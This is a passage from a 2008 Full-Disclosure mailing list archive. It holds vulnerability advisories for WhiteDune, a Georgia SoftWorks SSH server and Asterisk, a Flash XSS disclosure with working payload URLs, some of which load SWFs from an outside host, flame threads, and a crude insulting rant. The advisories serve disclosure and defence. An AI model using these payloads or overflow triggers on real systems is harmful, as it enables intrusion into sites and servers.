Another problem related to the handling of the errors.
After the building of the error message the parse() function returns
immediately and swDebugf() is called for visualizing it to stderr or to
the debugger without using the needed format argument required by the
function.

>From DuneApp.cpp:

DuneApp::ImportFile(const char *openpath, Scene* scene, bool protoLibrary,
                    Node *node, int field)
    ...
    if (errors[0]) {
        swMessageBox(_mainWnd, errors, "Parse Errors", SW_MB_OK, SW_MB_WARNING);
        swDebugf(errors);
        ...


#######################################################################

===========
3) The Code
===========


http://aluigi.org/poc/whitedunboffs.zip


#######################################################################

======
4) Fix
======


Version 0.29beta795


#######################################################################


--- 
Luigi Auriemma
http://aluigi.org



From aluigi at autistici.org  Wed Jan  2 19:55:57 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Wed, 2 Jan 2008 20:55:57 +0100
Subject: [Full-disclosure] Multiple vulnerabilities in Georgia SoftWorks
	SSH2 Server 7.01.0003
Message-ID: <20080102205557.cff7307a.aluigi@autistici.org>


#######################################################################

                             Luigi Auriemma

Application:  Georgia SoftWorks SSH2 Server (GSW_SSHD)
              http://www.georgiasoftworks.com/prod_ssh2/ssh2_server.htm
Versions:     <= 7.01.0003
Platforms:    Windows
Bugs:         A] format string in the log function
              B] buffer-overflow in the log function
              C] buffer-overflow in the handling of the password
Exploitation: remote
Date:         02 Jan 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


GSW_SSHD is a well known commercial SSH server which acts as SSH tunnel
for the telnet server GS_Tnet.exe.


#######################################################################

=======
2) Bugs
=======

------------------------------------
A] format string in the log function
------------------------------------

The logging function used by the server is affected by a format string
vulnerability caused by the usage of vsprintf for building the first
message (like "LoginPassword(%s(%s)[%u])") and the usage of another
vsprintf for building the final log entry.
The bug can be exploitable through the username field.


--------------------------------------
B] buffer-overflow in the log function
--------------------------------------

A buffer-overflow vulnerability is located in the same logging
function.
It's enough to use an username longer than 10000 chars to exploit the
vulnerability.


--------------------------------------------------
C] buffer-overflow in the handling of the password
--------------------------------------------------

The server is affected also by another buffer-overflow this time
located in the instructions which handle the password supplied by the
client exploitable through a string longer than 800 chars.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/poc/gswsshit.zip


#######################################################################

======
4) Fix
======


No fix


#######################################################################


--- 
Luigi Auriemma
http://aluigi.org



From tremaine at gmail.com  Wed Jan  2 20:05:19 2008
From: tremaine at gmail.com (Tremaine Lea)
Date: Wed, 2 Jan 2008 13:05:19 -0700
Subject: [Full-disclosure] Secreview re-review of quietmove ( F ---)
In-Reply-To: <20080102180813.C5B5050038@mailserver9.hushmail.com>
References: <20080102180813.C5B5050038@mailserver9.hushmail.com>
Message-ID: <6d456c360801021205v3ff661c7x8caeffc494b71464@mail.gmail.com>

Regardless of whether your intentions are good or not in performing
these reviews, one thing is crystal clear.  In order to perform these
reviews and have them accepted by those who would actually read and
depend on them to a degree, you need to have established yourself as a
credible source and have a good reputation.

With that in mind, I think the vast majority will continue to rely on
word of mouth from peers, or well respected and long standing
companies such as Gartner or even Dark Reading.  In my not so humble
opinion, you will not establish yourself as a credible resource by
engaging in petty disputes and mud slinging on FD.

Worse, it becomes more and more apparent that this is essentially an
attempt to drive interest to your blog.  I don't believe any serious
company would engage in the behaviour you have to date, so both your
motives and your method are in question.  If you genuinely wish to be
taken seriously and treated as a credible source of information about
other security vendors, I'd consider starting again from scratch and
develop a better method of attracting professional interest.  The key
is to attract the attention, not try and push your product down
throats.

Another quick lesson : if a vendor doesn't provide you with
information, the correct thing to do is simply note that you were
unable to review their product or services, and why.  To still attempt
a review with seriously incomplete information and then give a low
score is irresponsible at best.

-- 
Tremaine Lea
Network Security Consultant
Intrepid ACL
"Paranoia for hire"

On Jan 2, 2008 11:08 AM, SecReview <secreview at hushmail.com> wrote:
> Hi Adam,
>
> We've said this before and will say this again, this time to
> everyone.
>
> We would be more than happy to give your company (QuietMove) a
> "better" review if you'd enable us to do that. So far you haven't
> helped us to effectively review you at all. We tried to call you
> before our initial review, but never got hold of anyone. We also
> sent you an email before writing our second review, and you never
> responded to any of the questions in that email. If you'd like us
> to do a better review then provide us with the information that you
> think we will need to get the job done.
>
> Our current review is the product of your website, emails that
> you've posted to this and other forums, and your reaction to our
> first review. We haven't been able to find anything related to
> major accomplishments by you or by QuietMove, we haven't seen any
> sample reports, and we haven't received any answers to any
> questions about your methodologies for service execution and
> delivery. We even think that our current review might be too harsh,
> but can't change anything without more information.
>
> If you want us to change our review, we can do that again and we
> can do it in a non-biased way (regardless of all the rants and
> noise). We need you to tell us about your service delivery
> methodologies, your reporting methodologies, how you define
> specific service offerings, what markets you play in, and if
> possible sanitized sample reports. We won't publish any of that
> information directly, but we would use that to produce your next
> review.
>
> We want our reviews to accurately and truthfully reflect the
> quality and professionalism of the providers that we study. (In
> fact, if anyone has any suggestions as to how we could better
> "rank" security companies we'd be more than happy to listen and
> consider those suggestions.)
>
> Hope this helps. This will be our last email about QuietMove unless
> you request a redo of the current review. We will only redo the
> review if you are able to provide us with accurate information to
> help us get it done. We think that you should do it, because we
> think that you can score much better than an F+. (You're clearly
> not an idiot and you do have at least some experience.)
>
> -the end.
>
>
>
>
> Regards,
>       The Secreview Team
>       http://secreview.blogspot.com



From nate.mcfeters at gmail.com  Wed Jan  2 20:41:36 2008
From: nate.mcfeters at gmail.com (Nate McFeters)
Date: Wed, 2 Jan 2008 14:41:36 -0600
Subject: [Full-disclosure] Secreview re-review of quietmove ( F ---)
In-Reply-To: <6d456c360801021205v3ff661c7x8caeffc494b71464@mail.gmail.com>
References: <20080102180813.C5B5050038@mailserver9.hushmail.com>
	<6d456c360801021205v3ff661c7x8caeffc494b71464@mail.gmail.com>
Message-ID: <997ef2c20801021241q6563d51ai85390228bdb05128@mail.gmail.com>

Is anyone out there using these reviews?  It's just amazing that we are
still going through this.  SecReview is busting Adam for not credentializing
himself, but I see nothing of how they have credentialized what they are
doing.  It's absurd.

On 1/2/08, Tremaine Lea <tremaine at gmail.com> wrote:
>
> Regardless of whether your intentions are good or not in performing
> these reviews, one thing is crystal clear.  In order to perform these
> reviews and have them accepted by those who would actually read and
> depend on them to a degree, you need to have established yourself as a
> credible source and have a good reputation.
>
> With that in mind, I think the vast majority will continue to rely on
> word of mouth from peers, or well respected and long standing
> companies such as Gartner or even Dark Reading.  In my not so humble
> opinion, you will not establish yourself as a credible resource by
> engaging in petty disputes and mud slinging on FD.
>
> Worse, it becomes more and more apparent that this is essentially an
> attempt to drive interest to your blog.  I don't believe any serious
> company would engage in the behaviour you have to date, so both your
> motives and your method are in question.  If you genuinely wish to be
> taken seriously and treated as a credible source of information about
> other security vendors, I'd consider starting again from scratch and
> develop a better method of attracting professional interest.  The key
> is to attract the attention, not try and push your product down
> throats.
>
> Another quick lesson : if a vendor doesn't provide you with
> information, the correct thing to do is simply note that you were
> unable to review their product or services, and why.  To still attempt
> a review with seriously incomplete information and then give a low
> score is irresponsible at best.
>
> --
> Tremaine Lea
> Network Security Consultant
> Intrepid ACL
> "Paranoia for hire"
>
> On Jan 2, 2008 11:08 AM, SecReview <secreview at hushmail.com> wrote:
> > Hi Adam,
> >
> > We've said this before and will say this again, this time to
> > everyone.
> >
> > We would be more than happy to give your company (QuietMove) a
> > "better" review if you'd enable us to do that. So far you haven't
> > helped us to effectively review you at all. We tried to call you
> > before our initial review, but never got hold of anyone. We also
> > sent you an email before writing our second review, and you never
> > responded to any of the questions in that email. If you'd like us
> > to do a better review then provide us with the information that you
> > think we will need to get the job done.
> >
> > Our current review is the product of your website, emails that
> > you've posted to this and other forums, and your reaction to our
> > first review. We haven't been able to find anything related to
> > major accomplishments by you or by QuietMove, we haven't seen any
> > sample reports, and we haven't received any answers to any
> > questions about your methodologies for service execution and
> > delivery. We even think that our current review might be too harsh,
> > but can't change anything without more information.
> >
> > If you want us to change our review, we can do that again and we
> > can do it in a non-biased way (regardless of all the rants and
> > noise). We need you to tell us about your service delivery
> > methodologies, your reporting methodologies, how you define
> > specific service offerings, what markets you play in, and if
> > possible sanitized sample reports. We won't publish any of that
> > information directly, but we would use that to produce your next
> > review.
> >
> > We want our reviews to accurately and truthfully reflect the
> > quality and professionalism of the providers that we study. (In
> > fact, if anyone has any suggestions as to how we could better
> > "rank" security companies we'd be more than happy to listen and
> > consider those suggestions.)
> >
> > Hope this helps. This will be our last email about QuietMove unless
> > you request a redo of the current review. We will only redo the
> > review if you are able to provide us with accurate information to
> > help us get it done. We think that you should do it, because we
> > think that you can score much better than an F+. (You're clearly
> > not an idiot and you do have at least some experience.)
> >
> > -the end.
> >
> >
> >
> >
> > Regards,
> >       The Secreview Team
> >       http://secreview.blogspot.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/e1935887/attachment.html 

From worriedsecurity at googlemail.com  Wed Jan  2 21:02:44 2008
From: worriedsecurity at googlemail.com (worried security)
Date: Wed, 2 Jan 2008 21:02:44 +0000
Subject: [Full-disclosure] Uber Lamer Ass of the Year. Vote!
In-Reply-To: <90865ed50712232059s27a419b3j33ae8857bcfa70e0@mail.gmail.com>
References: <5c9b0ff50712221426u3e2d6b39y6ba8696e6491af27@mail.gmail.com>
	<90865ed50712232059s27a419b3j33ae8857bcfa70e0@mail.gmail.com>
Message-ID: <67ea64530801021302s4b004496k9667bf86708fde45@mail.gmail.com>

On Dec 24, 2007 4:59 AM, damncon <damncon at gmail.com> wrote:
>  I'm still wondering which are n3td3v main skills, and I am not
> joking, I have only seen him posting links to goverment news, security
> news, etc.
>
> What does really happens in n3td3v user group or whatever is it called.

We talk about things your mom wouldn't approve of and i'm not letting
you sign up, na na na.



From Valdis.Kletnieks at vt.edu  Wed Jan  2 21:55:02 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 02 Jan 2008 16:55:02 -0500
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
In-Reply-To: Your message of "Wed, 02 Jan 2008 13:48:13 CST."
	<e9d9d4020801021148v689e2ca5q35aa49c084fef0f2@mail.gmail.com>
References: <452214.1315441199301228241.JavaMail.servlet@perfora>
	<25233.1199302350@turing-police.cc.vt.edu>
	<e9d9d4020801021148v689e2ca5q35aa49c084fef0f2@mail.gmail.com>
Message-ID: <718.1199310902@turing-police.cc.vt.edu>

On Wed, 02 Jan 2008 13:48:13 CST, you said:

> its funny how you always talk about other people ( like a few days ago when
> you were amazed that people exploited an off by one ),

Actually, I was merely pointing out to a reader of the list that if you *can*
get x'41414141' into the appropriate register, you can probably abuse it into a
full exploit, and gave an example of an off-by-one-byte that produced such an
exploit.  Maybe in that reader's world, they can get away with asking "how is
that exploitable?", but some of us have to classify that as "should be
considered exploitable until proved otherwise".

>                                                        , and talk about "the
> old times"... sure signs of someone washed up as evident by your
> non-productiveness in the last few years

Failure to learn from the lessons of the past is a good way to shoot yourself
in the foot exactly the same way.  Yes - WANK was back in 1989.  However, even
now, almost 2 decades later, we're *still* seeing a lot of systems getting
exploited for the *exact same* base cause.

Additionally, it's proof that anybody who is just *now* waking up to the
concept of "cyber-warfare" is 20 years behind:

http://marc.info/?l=isn&m=100707930117213&w=2

It's also a good idea to keep in mind that not everybody in the security
industry measures "productivity" by "number of exploits published".  For some
of us who run production networkds, "no incidents happened, and none of the
users noticed a damned thing we did to ensure it" is the rarely attained
Nirvana.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/235359cf/attachment.bin 

From security at asterisk.org  Wed Jan  2 21:57:50 2008
From: security at asterisk.org (Asterisk Security Team)
Date: Wed, 02 Jan 2008 17:57:50 -0400
Subject: [Full-disclosure] AST-2008-001: Crash from transfer using BYE with
	Also header
Message-ID: <477C08DE.3090308@asterisk.org>

                Asterisk Project Security Advisory - AST-2008-001

    +------------------------------------------------------------------------+
    |       Product       | Asterisk                                         |
    |---------------------+--------------------------------------------------|
    |       Summary       | Remote Crash Vulnerability in SIP channel driver |
    |---------------------+--------------------------------------------------|
    | Nature of Advisory  | Denial of Service                                |
    |---------------------+--------------------------------------------------|
    |   Susceptibility    | Remote Unauthenticated Sessions                  |
    |---------------------+--------------------------------------------------|
    |      Severity       | Critical                                         |
    |---------------------+--------------------------------------------------|
    |   Exploits Known    | No                                               |
    |---------------------+--------------------------------------------------|
    |     Reported On     | December 26, 2007                                |
    |---------------------+--------------------------------------------------|
    |     Reported By     | Grey VoIP (bugs.digium.com user greyvoip)        |
    |---------------------+--------------------------------------------------|
    |      Posted On      | January 2, 2008                                  |
    |---------------------+--------------------------------------------------|
    |   Last Updated On   | January 2, 2008                                  |
    |---------------------+--------------------------------------------------|
    |  Advisory Contact   | Joshua Colp <jcolp at digium.com>                   |
    |---------------------+--------------------------------------------------|
    |      CVE Name       |                                                  |
    +------------------------------------------------------------------------+

    +------------------------------------------------------------------------+
    | Description | The handling of the BYE with Also transfer method was    |
    |             | broken during the development of Asterisk 1.4. If a      |
    |             | transfer attempt is made using this method the system    |
    |             | will immediately crash upon handling the BYE message due |
    |             | to trying to copy data into a NULL pointer. It is        |
    |             | important to note that a dialog must have already been   |
    |             | established and up in order for this to happen.          |
    +------------------------------------------------------------------------+

    +------------------------------------------------------------------------+
    | Resolution | A fix has been added so that the BYE with Also transfer   |
    |            | method now properly allocates and uses the transfer data  |
    |            | structure. It will no longer try to copy data into a NULL |
    |            | pointer and will operate properly.                        |
    +------------------------------------------------------------------------+

    +------------------------------------------------------------------------+
    |                           Affected Versions                            |
    |------------------------------------------------------------------------|
    |          Product           |   Release   |                             |
    |                            |   Series    |                             |
    |----------------------------+-------------+-----------------------------|
    |    Asterisk Open Source    |    1.0.x    | Unaffected                  |
    |----------------------------+-------------+-----------------------------|
    |    Asterisk Open Source    |    1.2.x    | Unaffected                  |
    |----------------------------+-------------+-----------------------------|
    |    Asterisk Open Source    |    1.4.x    | All versions prior to       |
    |                            |             | 1.4.17                      |
    |----------------------------+-------------+-----------------------------|
    | Asterisk Business Edition  |    A.x.x    | Unaffected                  |
    |----------------------------+-------------+-----------------------------|
    | Asterisk Business Edition  |    B.x.x    | Unaffected                  |
    |----------------------------+-------------+-----------------------------|
    | Asterisk Business Edition  |    C.x.x    | All versions prior to       |
    |                            |             | C.1.0-beta8                 |
    |----------------------------+-------------+-----------------------------|
    |        AsteriskNOW         | pre-release | All versions prior to beta7 |
    |----------------------------+-------------+-----------------------------|
    |     Asterisk Appliance     |     SVN     | All versions prior to       |
    |       Developer Kit        |             | Asterisk 1.4 revision 95946 |
    |----------------------------+-------------+-----------------------------|
    | s800i (Asterisk Appliance) |    1.0.x    | All versions prior to       |
    |                            |             | 1.0.3.4                     |
    +------------------------------------------------------------------------+

    +------------------------------------------------------------------------+
    |                              Corrected In                              |
    |------------------------------------------------------------------------|
    |    Product    |                        Release                         |
    |---------------+--------------------------------------------------------|
    | Asterisk Open |                 1.4.17, available from                 |
    |    Source     |   http://downloads.digium.com/pub/telephony/asterisk   |
    |---------------+--------------------------------------------------------|
    |   Asterisk    |                         C.1.0                          |
    |   Business    |                                                        |
    |    Edition    |                                                        |
    |---------------+--------------------------------------------------------|
    |  AsteriskNOW  |   Beta7, available from http://www.asterisknow.org/.   |
    |               |                                                        |
    |               |   Beta5 and Beta6 users can update using the system    |
    |               |     update feature in the appliance control panel.     |
    |---------------+--------------------------------------------------------|
    |   Asterisk    |  Asterisk 1.4 revision 95946. Available by performing  |
    |   Appliance   |            an svn update of the AADK tree.             |
    | Developer Kit |                                                        |
    |---------------+--------------------------------------------------------|
    |     s800i     |                        1.0.3.4                         |
    |   (Asterisk   |                                                        |
    |  Appliance)   |                                                        |
    +------------------------------------------------------------------------+

    +------------------------------------------------------------------------+
    |      Links       | http://bugs.digium.com/view.php?id=11637            |
    +------------------------------------------------------------------------+

    +------------------------------------------------------------------------+
    | Asterisk Project Security Advisories are posted at                     |
    | http://www.asterisk.org/security                                       |
    |                                                                        |
    | This document may be superseded by later versions; if so, the latest   |
    | version will be posted at                                              |
    | http://downloads.digium.com/pub/security/AST-2008-001.pdf and          |
    | http://downloads.digium.com/pub/security/AST-2008-001.html             |
    +------------------------------------------------------------------------+

    +------------------------------------------------------------------------+
    |                            Revision History                            |
    |------------------------------------------------------------------------|
    |       Date       |       Editor       |         Revisions Made         |
    |------------------+--------------------+--------------------------------|
    | 2008-01-02       | Joshua Colp        | Initial Release                |
    +------------------------------------------------------------------------+

                Asterisk Project Security Advisory - AST-2008-001
               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
   Permission is hereby granted to distribute and publish this advisory in its
                            original, unaltered form.



From steven.mcgrath at chigeek.com  Wed Jan  2 16:07:31 2008
From: steven.mcgrath at chigeek.com (Steven McGrath)
Date: Wed, 2 Jan 2008 10:07:31 -0600
Subject: [Full-disclosure] January 4th Chicago 2600 Meeting Information
Message-ID: <28326b7c0801020807y15a9ab1cg76844186cd98f190@mail.gmail.com>

The January Chicago 2600/DefCon 312 Meeting is near! The meeting
will be Friday,
January 4th at the Neighborhood Boys and Girls Club and will feature
much of the same usual fun that all of you have grown to expect!


REQUIREMENTS:
* Laptop (Mac/Linux/Windows) capable of running VMWare
OR
* Laptop with full Ruby on Rails and ruby-sqllite3 installed.


[Presentation Information]
- 9:00pm - Distributed Nmap: How to Automate Scans for an Environment
- Tentative - Jax By Jaku
- After hours - Wii, Music, Socializing, etc.

[General Information]
- Meeting Time: 7.00pm - Approx. 3-5am
- Meeting Date: Friday, January 4th
- Place : 2501 W Irving Park Road, Chicago
- More Info : http://chicago2600.net



From 31415926 at hush.ai  Wed Jan  2 16:46:28 2008
From: 31415926 at hush.ai (31415926 at hush.ai)
Date: Wed, 02 Jan 2008 16:46:28 +0000
Subject: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]
Message-ID: <20080102164630.F3980118039@mailserver5.hushmail.com>

Critical Vulnerability in [Full-Disclosure]

The problem with full disclosure is that everyone feels the need to 
fully disclose, even when their opinion and the information they 
are purporting to impart is, well, bollocks. You can't tell them to 
shut up as they think they're important and the internet gives them 
balls of steel and verbal diarhoea, so we stumble from one tired 
flamewar to another with no useful content being published.

It's embarrassing.

I'm an advocate of FD as a concept. I believe that there is no such 
thing as an innocent on the internet and if you really are that 
dumb, then you deserve everything you get. FD (as one of many like-
minded lists) forces the vendors to patch or die and eventually 
write quality code. FD (the concept, not the list) is the ultimate 
nuclear deterrent, without the mutually assured destruction lunacy.

I have watched the posters to this list for some time. By far the 
vast majority are transparently kiddies, sitting on their painted-
up laptops thinking of themselves as the techno-brats in the film 
"Hackers" and hoping to grow up to be like the guy in the film 
"Swordfish". They write in l33t5p34k and think that this somehow 
makes them informed. Kiddies are the lowest form of life in the 
hierarchy of information security and in the IT industry generally.

You know who you are and so does everyone else. You are fools, and 
an embarrassment to the craft:
Secreview (review of products/services you have never bought, are 
you the goatse.cz receiver?)
Reepex (Isn't a reepex a bit of farm machinery?)
Gobbles (A nickname for a gay male prostitute)
Morning Wood (The holy grail of the viagra-abuser)
Gmaggro ("high value target selection", are you completely cocking 
stupid?)

Oh, the outrage.

I can see it now. there will be armies of skiddies demanding that 
the l33tz hack this f at cker, spam him, pwn him, and post defamatory 
messages concerning her skills and possible employment 
opportunities for her and her mother everywhere possible. Guess 
what, kids? I don't care.

No, not even a little bit. Do what you like, I could care less and 
no one else cares if you live or die tonight, you sad, acne'd 
little dewdrops.

Calmed down yet?

Good. I want you to consider something.

The FD list consists of the following content (and what it has to 
say):

Advisories by vendors (we fixed this)
Advisories by individuals (I tested that and found this)
Advisories by infosec organisations (we found this)
Funnies (self explanatory)
Opinions (this sucks, what about that?)
Skids (I did this, aren't I great, everyone else sucks?)
Trolls (you suck)
Trawlers (I have something 0day to buy or sell)

The top three (ie the useful content) is available in any one of a 
hundred places, the bottom three are noise. The only people 
interested in the noise are those who keep track of it for a 
living.

So, consider that by posting anything in the bottom three 
categories, you are drawing the attention of those who take an 
interest in your sad efforts to destabilise the technical crutch of 
society. These people are better than you in every important way, 
and if you so much as tiptoe across one of their lines, you'll wind 
up sharing a cell with a 7ft gorilla called george with a dead 
mouse and a pressing need to dry-cornhole your ringpiece 3 times a 
night and twice on sundays. Do yourselves a favour and STFU.

What's left?

The funnies and the opinions. I've laughed my tits off at posts by 
Mssrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and i've 
been interested by a few others who will remain nameless as I can't 
list them all. Long live full disclosure, but keep in mind that 
you're only legends in your own bedrooms.

later, pi

--
Click to get a free auto insurance quotes from top companies.
http://tagline.hushmail.com/fc/Ioyw6h4d8EIl5uJlSoB5C7HKVmuBsQOXlKB8YUus2MT2FpMkQCNmCM/



From rcannings at gmail.com  Wed Jan  2 18:54:18 2008
From: rcannings at gmail.com (rich cannings)
Date: Wed, 2 Jan 2008 10:54:18 -0800
Subject: [Full-disclosure] XSS Vulnerabilities in Common Shockwave Flash
	Files
Message-ID: <884d17920801021054k3b2a8b9t1a4cbe64f0bac800@mail.gmail.com>

Hi.

Recently, there has been news regarding Flash authoring tools and XSS,
but the articles contained little technical information. So, I created
a detailed report at:

http://docs.google.com/Doc?docid=ajfxntc4dmsq_14dt57ssdw

An abbreviated version intended for full-disclosure, bugtraq, and
websecurity lists is below.


SUMMARY

Critical vulnerabilities exist in a large number of widely used web
authoring tools that automatically generate Shockwave Flash (SWF)
files, such as Adobe (r) Dreamweaver (r), Adobe Acrobat (r) Connect
(tm) (formerly Macromedia Breeze), InfoSoft FusionCharts, and
Techsmith Camtasia. The flaws render websites that host these
generated SWF files vulnerable to Cross-Site Scripting (XSS).

This problem is not limited to authoring tools. Autodemo, a popular
service provider, used a vulnerable controller SWF in many of their
projects.

Simple Google hacking queries reveal that hundreds of thousands of
SWFs are vulnerable on the Internet, and a considerable percentage of
major Internet sites are affected. We are only reporting XSS
vulnerabilities that have been fixed by the vendors.


THE PROBLEM

Many web authoring tools that automatically generate SWFs insert
identical and vulnerable ActionScript into all saved SWFs or necessary
controller SWFs (think of tools that "save as SWF", "export to SWF",
etc.). The vulnerable ActionScript can used by attackers to execute
arbitrary JavaScript in the security domain of the website hosting the
SWF.

We were unable to perform an exhaustive review of all authoring tools
that generate SWFs. More XSS issues may exist in the products listed
below and certainly exist in other applications that save to SWF.

We are only reporting XSS vulnerabilities that have been fixed by the
vendors. There are more products vulnerable. We will publish more
information when the vendor releases fixes.

Adobe Dreamweaver

The "skinName" parameter is accepted by all Flash files produced by
the "Insert Flash Video" feature. "skinName" can be used to force
victims to load of arbitrary URLs including the "asfunction" protocol
handler:

http://www.example.com/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//

Adobe was contacted on August 8, 2007. This issue was fixed in the
December Flash player release.

Adobe Acrobat Connect/Macromedia Dreamweaver

"main.swf" is the controller file in all Connect/Breeze online
presentations. This SWF does not properly validate the "baseurl"
parameter; thus causing script injection:

http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//

Adobe was contacted on July 31, 2007. This issue was fixed in the
December Flash player release.

InfoSoft FusionCharts

One of the issues found in FusionCharts was that the "dataURL"
parameter allows insertion of arbitrary HTML into a "TextArea"
instance. This allows attackers to load SWFs from other domains:

http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//cannings.org/DoKnowEvil.swf%3F.jpg%22%3E

InfoSoft was contacted on September 2, 2007. Fixes for all issues we
found were released in late September. Webmasters should consult
InfoSoft to properly upgrade their SWFs. See "The Fix" for details.

Techsmith Camtasia

One of the issues found in Camtasia was that the "csPreloader"
parameter loads an arbitrary flash file:

http://www.example.com/Example_controller.swf?csPreloader=http://cannings.org/DoKnowEvil.swf%3f

Techsmith was contacted on August 12, 2007. Fixes for all issues was
released late September. Webmasters should contact Techsmith to
properly upgrade their SWFs. See "The Fix" for details.

Autodemo

Autodemo is a service provider, not an authoring tool. However, like
authoring tools they use a common control file in many demos. The
"onend" parameter in "control.swf" loads arbitrary URLs including the
JavaScript protocol handler:

http://www.example.com/control.swf?onend=javascript:alert(1)//

Autodemo was contacted on August 17, 2007. Autodemo was extremely
responsive to our report and quickly fixed the issue in early
September. Webmasters must update to the latest "control.swf". See
"The Fix" for details.

Autodemo is not the only service provider to have XSS in their
products. They are just the only service provider we looked at.
Readers should be  concerned about other service providers who don't
even know their SWFs are vulnerable.


THE FIX

See http://docs.google.com/Doc?docid=ajfxntc4dmsq_14dt57ssdw.


CREDITS

First and foremost, we thank Stafano Di Paola of Minded Security and
Obscure of EyeonSecurity who thoroughly researched and pioneered every
attack we used.

Thanks to Autodemo, Infosoft, and Techsmith for quickly fixing this
issue. We also thank the Computer Emergency Response Team for
coordinating with the vendors to fix this issue, the Adobe Flash
player development teams for including some fixes in the player (we
hope to see more in the future), the Adobe Software Security
Engineering Team, and the Google Security Team for giving me time to
pursue this research and coauthor a book.


QUIZ

Given the ActionScript:

/*
 * Quiz app
 *
 * To compile:
 *   mtasc -swf Quiz.swf -main -header 10:10:10 Quiz.as
 */

class Quiz {
  static function main(mc) {
    getURL("javascript:someFunction('" + escape(_root.userDefined) + "')");
  }
}

Question

Create an URL for Firefox, Internet Explorer, and Safari that will
execute JavaScript in the domain hosting Quiz.swf.

Answer (in base64)

aHR0cDovL2V4YW1wbGUuY29tL1F1aXouc3dmP3VzZXJEZWZpbmVkPS
cpO2Z1bmN0aW9uJTIwc29tZUZ1bmN0aW9uKGEpe31hbGVydCgxKS8v



From lyalc at swiftdsl.com.au  Wed Jan  2 20:59:36 2008
From: lyalc at swiftdsl.com.au (Lyal Collins)
Date: Thu, 3 Jan 2008 06:59:36 +1000
Subject: [Full-disclosure] Secreview re-review of quietmove ( F ---)
In-Reply-To: <6d456c360801021205v3ff661c7x8caeffc494b71464@mail.gmail.com>
Message-ID: <004e01c84d82$62194690$0203a8c0@kpllaptop>

I'd add to this that anyone who buys security consulting/pen test services
et al solely on the basis of web site content is unlikely to get any
worthwhile outcomes for their specific needs. 

No effective manager in any company/government I've seen is going to refer
to a web site alone, or to bother finding obscure posts on a specialist
mailing list that may or may not be relevant to their needs - they merely
use web sites as a source of potential suppliers before interviewing them,
and getting references.

Let kill this pointless waste on inbox space, please.
lyalc


-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Tremaine Lea
Sent: Thursday, 3 January 2008 6:05 AM
To: SecReview
Cc: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Secreview re-review of quietmove ( F ---)


Regardless of whether your intentions are good or not in performing these
reviews, one thing is crystal clear.  In order to perform these reviews and
have them accepted by those who would actually read and depend on them to a
degree, you need to have established yourself as a credible source and have
a good reputation.

With that in mind, I think the vast majority will continue to rely on word
of mouth from peers, or well respected and long standing companies such as
Gartner or even Dark Reading.  In my not so humble opinion, you will not
establish yourself as a credible resource by engaging in petty disputes and
mud slinging on FD.

Worse, it becomes more and more apparent that this is essentially an attempt
to drive interest to your blog.  I don't believe any serious company would
engage in the behaviour you have to date, so both your motives and your
method are in question.  If you genuinely wish to be taken seriously and
treated as a credible source of information about other security vendors,
I'd consider starting again from scratch and develop a better method of
attracting professional interest.  The key is to attract the attention, not
try and push your product down throats.

Another quick lesson : if a vendor doesn't provide you with information, the
correct thing to do is simply note that you were unable to review their
product or services, and why.  To still attempt a review with seriously
incomplete information and then give a low score is irresponsible at best.

-- 
Tremaine Lea
Network Security Consultant
Intrepid ACL
"Paranoia for hire"

On Jan 2, 2008 11:08 AM, SecReview <secreview at hushmail.com> wrote:
> Hi Adam,
>
> We've said this before and will say this again, this time to everyone.
>
> We would be more than happy to give your company (QuietMove) a 
> "better" review if you'd enable us to do that. So far you haven't 
> helped us to effectively review you at all. We tried to call you 
> before our initial review, but never got hold of anyone. We also sent 
> you an email before writing our second review, and you never responded 
> to any of the questions in that email. If you'd like us to do a better 
> review then provide us with the information that you think we will 
> need to get the job done.
>
> Our current review is the product of your website, emails that you've 
> posted to this and other forums, and your reaction to our first 
> review. We haven't been able to find anything related to major 
> accomplishments by you or by QuietMove, we haven't seen any sample 
> reports, and we haven't received any answers to any questions about 
> your methodologies for service execution and delivery. We even think 
> that our current review might be too harsh, but can't change anything 
> without more information.
>
> If you want us to change our review, we can do that again and we can 
> do it in a non-biased way (regardless of all the rants and noise). We 
> need you to tell us about your service delivery methodologies, your 
> reporting methodologies, how you define specific service offerings, 
> what markets you play in, and if possible sanitized sample reports. We 
> won't publish any of that information directly, but we would use that 
> to produce your next review.
>
> We want our reviews to accurately and truthfully reflect the quality 
> and professionalism of the providers that we study. (In fact, if 
> anyone has any suggestions as to how we could better "rank" security 
> companies we'd be more than happy to listen and consider those 
> suggestions.)
>
> Hope this helps. This will be our last email about QuietMove unless 
> you request a redo of the current review. We will only redo the review 
> if you are able to provide us with accurate information to help us get 
> it done. We think that you should do it, because we think that you can 
> score much better than an F+. (You're clearly not an idiot and you do 
> have at least some experience.)
>
> -the end.
>
>
>
>
> Regards,
>       The Secreview Team
>       http://secreview.blogspot.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



From 300baud at gmail.com  Wed Jan  2 22:30:02 2008
From: 300baud at gmail.com (Line Noise)
Date: Wed, 2 Jan 2008 14:30:02 -0800
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
